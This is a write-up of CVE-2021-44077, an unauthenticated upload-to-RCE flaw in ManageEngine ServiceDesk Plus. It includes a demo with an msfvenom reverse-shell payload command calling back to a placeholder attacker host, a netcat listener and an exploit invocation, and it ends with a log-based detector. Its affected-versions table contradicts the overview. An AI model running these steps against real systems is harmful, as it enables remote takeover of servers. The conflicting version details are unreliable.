# CVE-2021-44077
## _Overview_
On September 16, 2021, ManageEngine (a division of Zoho) released build 11306 of ManageEngine ServiceDesk Plus to patch the vulnerability CVE-2021-44077.
CVE-2021-44077 is an authentication bypass vulnerability affecting on-premises installations of ManageEngine ServiceDesk Plus running build 11305 or earlier.
The vulnerability stems from an improper security configuration in ServiceDesk Plus, which allowed attackers to gain unauthorized access to the application's data through several of its application URLs.
**Detail**
| Field | Value |
| ----- | ----- |
| CVSS Score | 9.8 |
| Severity | Critical |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Affected products | SupportCenter Plus, ServiceDesk Plus MSP, ServiceDesk Plus |
| Vulnerability type | Remote Code Execution |
| Affected versions | ServiceDesk Plus versions 10527 through 10529; SupportCenter Plus versions 11012 and 11013; ServiceDesk Plus MSP versions 10527 through 10529. |
## _Cause of vulnerability_
According to ManageEngine's own advisory, this is an authentication bypass vulnerability that allows arbitrary file upload.
An attacker reaches the upload interface through the REST API without authorization, uploads a malicious `exe` into the `/bin` directory so that it overwrites the original executable, and then uses the program's own functionality to trigger the `exe` that was just uploaded, resulting in RCE.
**RestAPI**
The routing of the API interface in `web.xml` is as follows:

```xml
<servlet-mapping>
    <servlet-name>action</servlet-name>
    <url-pattern>/RestAPI/*</url-pattern>
</servlet-mapping>
```
1. The first is the REST API `s247AgentInstallationProcess`, which is called when new software needs to be installed.

This endpoint in turn calls `S247Util.installAgentProgress(apikey)`.

The core of this endpoint is to invoke the Windows Installer utility `msiexec.exe` from the command line to install `Site24x7WindowsAgent.msi`.
Normally, the `msiexec.exe` utility of ManageEngine ServiceDesk Plus is located under `ManageEngine\ServiceDesk\bin`, and the command line used for the installation is: `C:\Program Files\ManageEngine\ServiceDesk\bin\msiexec.exe /i Site24x7WindowsAgent.msi EDITA1=apikey /qn`
2. Next we analyze the file upload without input validation, whose root cause is the REST API `ImportTechniciansAction`.

Through its `getTheFile()` function, this endpoint writes the uploaded file directly to disk without authentication. If a file with the same name already exists, it is overwritten.
If the attacker uploads a file named `msiexec.exe`, the existing binary on the system is overwritten. Once the attacker then calls the API `s247AgentInstallationProcess`, the replaced `msiexec.exe` is executed, giving the attacker remote code execution on the victim machine.
## _Demo_
**Step 1:** Download and install any ManageEngine ServiceDesk Plus build from 11138 to 11145, or any build below 11306. [Download here](http://archives.manageengine.com/service-desk/)
> Before starting ManageEngine ServiceDesk Plus.

> After starting ManageEngine ServiceDesk Plus.
**Step 2:** Use Metasploit's `msfvenom` to generate an executable named `msiexec.exe`.

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER.IP LPORT=ATTACKER.PORT -f exe > msiexec.exe
```

With:
- `-p`: payload to use
- `LHOST`: the attacker IP
- `LPORT`: the attacker port
- `-f`: output format
**Step 3:** Create a script that sends the file `msiexec.exe` to the victim's machine.

The script performs two actions:
- First, the executable is sent to the REST API `ImportTechniciansAction`, overwriting the file `msiexec.exe`.

- Next, the `Site24x7WindowsAgent` installation is called, which automatically executes the file `msiexec.exe`.

**Step 4:** Start a listener on the attacker machine on the same port used in the Metasploit payload.

```shell
nc -lvnp ATTACKER.PORT
```

**Step 5:** Launch the attack against the victim's machine with the payload.

```shell
python3 exploit.py http://<TARGET_IP>:<PORT_HTTP_PROXY> <path_to_msiexec.exe>
```

The attacker now has remote code execution on the victim's computer.

**Step 6:** Use the obtained shell to read the `win.ini` file on the victim machine.

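The upload-then-trigger sequence described in the cause analysis and in Step 3 leaves a recognisable trace in the web server access log: an unauthenticated POST to the import endpoint followed shortly by a POST to the agent-installation endpoint from the same source. The following detector is an added example, not code from the original write-up or from ManageEngine; the log lines are constructed, and the exact request paths under `/RestAPI/` are assumed from the `web.xml` mapping and the endpoint names above.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (Combined Log Format); not real ServiceDesk Plus logs.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "POST /RestAPI/ImportTechniciansAction HTTP/1.1" 200 512 "-" "python-requests/2.26"
203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "POST /RestAPI/s247AgentInstallationProcess HTTP/1.1" 200 88 "-" "python-requests/2.26"
198.51.100.4 - - [10/Dec/2021:14:05:40 +0000] "GET /RestAPI/requests HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:15:30:00 +0000] "POST /RestAPI/ImportTechniciansAction HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed request paths, derived from the /RestAPI/* servlet mapping and the endpoint names above.
UPLOAD_PATH = "/RestAPI/ImportTechniciansAction"        # unauthenticated file write into bin\
TRIGGER_PATH = "/RestAPI/s247AgentInstallationProcess"  # runs bin\msiexec.exe

def parse(line):
    # Returns ip, ts (datetime), method, path (query string stripped), status; None if unparsable.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec

def detect_chain(log_text, window=timedelta(minutes=10)):
    """Flag every source IP that POSTs to the upload endpoint; if the same IP then POSTs to the
    agent-installation trigger within `window`, report the full upload-then-trigger chain."""
    pending = {}   # ip -> timestamp of its most recent unmatched upload
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec["method"] != "POST":
            continue
        ip = rec["ip"]
        if rec["path"] == UPLOAD_PATH:
            pending[ip] = rec["ts"]
        elif rec["path"] == TRIGGER_PATH and ip in pending:
            kind = "upload-then-trigger" if rec["ts"] - pending.pop(ip) <= window else "upload-only"
            findings.append((ip, kind))
    findings.extend((ip, "upload-only") for ip in pending)  # uploads never followed by a trigger
    return findings

if __name__ == "__main__":
    for ip, kind in detect_chain(SAMPLE_LOG):
        print(f"{ip}: {kind}")
```

Any hit on the upload endpoint from an unpatched build is worth investigating on its own, since the write to `bin\msiexec.exe` happens before the trigger request; the chain simply raises the confidence.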
## _Reference_
- https://nvd.nist.gov/vuln/detail/CVE-2021-44077
- https://github.com/horizon3ai/CVE-2021-44077
- https://xz.aliyun.com/t/10631
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec